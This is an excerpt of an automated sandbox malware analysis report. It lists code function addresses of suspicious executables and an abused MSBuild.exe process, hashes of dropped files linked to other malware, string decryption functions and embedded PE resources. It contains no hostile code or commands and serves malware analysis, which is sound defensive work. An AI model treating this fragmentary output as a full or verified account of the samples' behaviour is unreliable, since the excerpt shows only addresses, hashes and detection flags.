Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748EB06D0 22_2_00007FF748EB06D0
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F3B570 22_2_00007FF748F3B570
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748E6F6C0 22_2_00007FF748E6F6C0
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F40DA4 22_2_00007FF748F40DA4
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748E67E80 22_2_00007FF748E67E80
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748E98670 22_2_00007FF748E98670
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748E89640 22_2_00007FF748E89640
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748EEAE30 22_2_00007FF748EEAE30
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748EA5620 22_2_00007FF748EA5620
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748E61000 22_2_00007FF748E61000
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748E7EFD0 22_2_00007FF748E7EFD0
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F3C868 22_2_00007FF748F3C868
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748ED97C0 22_2_00007FF748ED97C0
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748EB3FA0 22_2_00007FF748EB3FA0
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748EFD790 22_2_00007FF748EFD790
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748E68780 22_2_00007FF748E68780
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748ECD770 22_2_00007FF748ECD770
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F440C0 22_2_00007FF748F440C0
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748E98F40 22_2_00007FF748E98F40
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748EAD740 22_2_00007FF748EAD740
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748ED1F40 22_2_00007FF748ED1F40
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748EEFF20 22_2_00007FF748EEFF20
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F18F30 22_2_00007FF748F18F30
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748EAD0E0 22_2_00007FF748EAD0E0
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F3E74C 22_2_00007FF748F3E74C
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F028C0 22_2_00007FF748F028C0
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748E8A890 22_2_00007FF748E8A890
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F277B0 22_2_00007FF748F277B0
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748EAE070 22_2_00007FF748EAE070
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748EE5870 22_2_00007FF748EE5870
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748ED0850 22_2_00007FF748ED0850
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748EF7840 22_2_00007FF748EF7840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_0044C020 24_2_0044C020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_00443020 24_2_00443020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_00447100 24_2_00447100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_004371CD 24_2_004371CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_0040B370 24_2_0040B370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_00443390 24_2_00443390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_0042F410 24_2_0042F410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_0044B4A0 24_2_0044B4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_004205B0 24_2_004205B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_0043699B 24_2_0043699B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_00415D2C 24_2_00415D2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_0040EFD0 24_2_0040EFD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_0041E062 24_2_0041E062
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_0040C0E0 24_2_0040C0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_0042F0AD 24_2_0042F0AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_0041215A 24_2_0041215A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_0044A184 24_2_0044A184
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_0043527B 24_2_0043527B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_00413203 24_2_00413203
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_004242DE 24_2_004242DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_004082B0 24_2_004082B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_004222BA 24_2_004222BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_00402310 24_2_00402310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_00439311 24_2_00439311
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_0042E3F0 24_2_0042E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_0043B44C 24_2_0043B44C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_00412405 24_2_00412405
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_0041342C 24_2_0041342C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_004444B0 24_2_004444B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_00428560 24_2_00428560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_0041656F 24_2_0041656F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_0041E570 24_2_0041E570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_0041A500 24_2_0041A500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_0043C59A 24_2_0043C59A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_0041459B 24_2_0041459B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_004075B0 24_2_004075B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_004475B0 24_2_004475B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_0043D611 24_2_0043D611
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_004036D0 24_2_004036D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_004366D1 24_2_004366D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_004376EA 24_2_004376EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_004256B0 24_2_004256B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_004426B0 24_2_004426B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_0040B730 24_2_0040B730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_00422739 24_2_00422739
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_004247F0 24_2_004247F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_0040C780 24_2_0040C780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_004067A6 24_2_004067A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_0044185C 24_2_0044185C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_00431872 24_2_00431872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_004308D6 24_2_004308D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_00408890 24_2_00408890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_00447940 24_2_00447940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_00434960 24_2_00434960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_0044B960 24_2_0044B960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_00442910 24_2_00442910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_0043B9D0 24_2_0043B9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_00444A50 24_2_00444A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_0043FA64 24_2_0043FA64
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_00416A70 24_2_00416A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_0041DACC 24_2_0041DACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_0040FA80 24_2_0040FA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_00428B70 24_2_00428B70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_0041FB2D 24_2_0041FB2D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_00409BE0 24_2_00409BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_0044ABE6 24_2_0044ABE6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_00444C60 24_2_00444C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_0043CC74 24_2_0043CC74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_00413C00 24_2_00413C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_00437C3A 24_2_00437C3A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_0044BCA0 24_2_0044BCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_00436D11 24_2_00436D11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_0042BD20 24_2_0042BD20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_00402D30 24_2_00402D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_0040BD30 24_2_0040BD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_00430D8F 24_2_00430D8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_00408E10 24_2_00408E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_00424E13 24_2_00424E13
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_00441E2B 24_2_00441E2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_0040DE38 24_2_0040DE38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_00410EC6 24_2_00410EC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_00416EB0 24_2_00416EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_00401F60 24_2_00401F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_0043DFD0 24_2_0043DFD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_00431FF3 24_2_00431FF3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_00403FB2 24_2_00403FB2
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7387A61C0 25_2_00007FF7387A61C0
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73878F1E4 25_2_00007FF73878F1E4
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7387821F0 25_2_00007FF7387821F0
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73874EA00 25_2_00007FF73874EA00
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7386F5A10 25_2_00007FF7386F5A10
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7386E49F0 25_2_00007FF7386E49F0
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7386F89F0 25_2_00007FF7386F89F0
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73876A140 25_2_00007FF73876A140
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF738735150 25_2_00007FF738735150
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7386D19A0 25_2_00007FF7386D19A0
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7386EF280 25_2_00007FF7386EF280
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73879F2F4 25_2_00007FF73879F2F4
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73871BAF0 25_2_00007FF73871BAF0
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF738760B00 25_2_00007FF738760B00
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7386FEA20 25_2_00007FF7386FEA20
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73879BA20 25_2_00007FF73879BA20
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7386E0310 25_2_00007FF7386E0310
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF738766A30 25_2_00007FF738766A30
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73878424A 25_2_00007FF73878424A
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7387032E0 25_2_00007FF7387032E0
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF738721A50 25_2_00007FF738721A50
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7386DB2D0 25_2_00007FF7386DB2D0
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73878CA6C 25_2_00007FF73878CA6C
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF738751270 25_2_00007FF738751270
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73875CA90 25_2_00007FF73875CA90
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7386E5B70 25_2_00007FF7386E5B70
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7387613F0 25_2_00007FF7387613F0
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73878BB20 25_2_00007FF73878BB20
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73872A320 25_2_00007FF73872A320
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF738728330 25_2_00007FF738728330
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73879B340 25_2_00007FF73879B340
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73878E344 25_2_00007FF73878E344
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF738773CD0 25_2_00007FF738773CD0
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73871B4E0 25_2_00007FF73871B4E0
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73872BCE0 25_2_00007FF73872BCE0
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF738721D10 25_2_00007FF738721D10
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73879C508 25_2_00007FF73879C508
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73877D420 25_2_00007FF73877D420
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73878D450 25_2_00007FF73878D450
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73878CC70 25_2_00007FF73878CC70
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF738784C70 25_2_00007FF738784C70
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF738707CB0 25_2_00007FF738707CB0
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73879F478 25_2_00007FF73879F478
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF738790DA4 25_2_00007FF738790DA4
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7386DDD80 25_2_00007FF7386DDD80
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73878A534 25_2_00007FF73878A534
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF738793550 25_2_00007FF738793550
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73878E548 25_2_00007FF73878E548
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73878B570 25_2_00007FF73878B570
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7386B7E80 25_2_00007FF7386B7E80
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73878CEB4 25_2_00007FF73878CEB4
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF738784EB0 25_2_00007FF738784EB0
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7386E8670 25_2_00007FF7386E8670
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7386D9640 25_2_00007FF7386D9640
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7386F5620 25_2_00007FF7386F5620
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF738731710 25_2_00007FF738731710
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73879B628 25_2_00007FF73879B628
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73873AE30 25_2_00007FF73873AE30
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7387A2E48 25_2_00007FF7387A2E48
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7387006D0 25_2_00007FF7387006D0
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73876A660 25_2_00007FF73876A660
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7386BF6C0 25_2_00007FF7386BF6C0
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73875D670 25_2_00007FF73875D670
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF738799694 25_2_00007FF738799694
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73877CE90 25_2_00007FF73877CE90
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7386B8780 25_2_00007FF7386B8780
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7387777B0 25_2_00007FF7387777B0
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7387297C0 25_2_00007FF7387297C0
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7386FD740 25_2_00007FF7386FD740
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7386E8F40 25_2_00007FF7386E8F40
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73873FF20 25_2_00007FF73873FF20
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7386B1000 25_2_00007FF7386B1000
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF738768F30 25_2_00007FF738768F30
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF738721F40 25_2_00007FF738721F40
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73878E74C 25_2_00007FF73878E74C
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7386CEFD0 25_2_00007FF7386CEFD0
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73871D770 25_2_00007FF73871D770
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF738703FA0 25_2_00007FF738703FA0
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73874D790 25_2_00007FF73874D790
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7386DA890 25_2_00007FF7386DA890
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7387940C0 25_2_00007FF7387940C0
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7386FE070 25_2_00007FF7386FE070
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7387528C0 25_2_00007FF7387528C0
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF738747840 25_2_00007FF738747840
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7386FD0E0 25_2_00007FF7386FD0E0
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF738720850 25_2_00007FF738720850
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73878C868 25_2_00007FF73878C868
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF738735870 25_2_00007FF738735870
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\crypted.54[1].exe 2D29A4D1EF26E685872D495BB5B38D098740F9547E3AFD4862029A7D529EB08B
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\random[1].exe 28D15F133C8EA7BF4C985207EEFDC4C8C324FF2552DF730F8861FCC041BC3E93
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 0041A4F0 appears 100 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 0040AC40 appears 78 times
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: String function: 00DE9CB3 appears 31 times
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: String function: 00E00A30 appears 41 times
PE file contains executable resources (Code or Archives)
Source: random[1].exe.21.dr Static PE information: Resource name: RT_RCDATA type: x86 executable
Source: 466f8e521c.exe.21.dr Static PE information: Resource name: RT_RCDATA type: x86 executable
Source: random[1].exe1.21.dr Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: 466a80d633.exe.21.dr Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: f4d01cf3f8.exe.43.dr Static PE information: Resource name: RT_RCDATA type: x86 executable
Source: 01ea7855d3.exe.43.dr Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Sample file is different than original file name gathered from version info
Source: Af3hqfTjFh.exe, 00000000.00000003.871827209.0000000001781000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FV_ORIGINALFILENAMEMFL vs Af3hqfTjFh.exe
Source: Af3hqfTjFh.exe, 00000000.00000003.871897759.0000000001782000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FV_ORIGINALFILENAMEMFL vs Af3hqfTjFh.exe
Source: Af3hqfTjFh.exe, 00000000.00000003.867250565.00000000018BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs Af3hqfTjFh.exe
Source: Af3hqfTjFh.exe, 00000000.00000003.867250565.00000000018BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FV_ORIGINALFILENAME/ vs Af3hqfTjFh.exe
